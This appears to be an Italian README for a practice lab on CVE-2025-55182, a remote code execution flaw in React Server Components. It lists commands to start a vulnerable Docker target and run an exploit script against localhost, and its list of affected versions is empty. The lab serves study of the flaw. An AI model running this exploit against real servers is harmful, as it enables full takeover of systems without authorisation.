
Un laboratorio pratico per comprendere e sfruttare CVE-2025-55182 (React2Shell) - Esecuzione di codice remoto in React Server Components
Un laboratorio pratico per sfruttare CVE-2025-55182 (React2Shell) - Esecuzione di codice remota in React Server Components.
Solo a scopo educativo. Testa solo su sistemi che possiedi.
# Clone and start
git clone https://github.com/dhananjayakumarn/CVE-2025-55182-Lab.git
cd CVE-2025-55182-Lab
docker-compose up -d
# Wait 20 seconds, then exploit
python3 exploit.py http://localhost:3000 "whoami"
È tutto! Dovresti vedere l'output del comando che dimostra la RCE.
Vulnerabilità RCE critica in React Server Components (CVSS 10.0).
Versioni interessate:
Impatto: Una singola richiesta HTTP = Controllo totale del server.
python3 exploit.py <target> <command>
# Examples
python3 exploit.py http://localhost:3000 "whoami"
python3 exploit.py http://localhost:3000 "id"
python3 exploit.py http://localhost:3000 "ls -la"
docker-compose down
⭐ Metti una stella se ti è stato utile per imparare!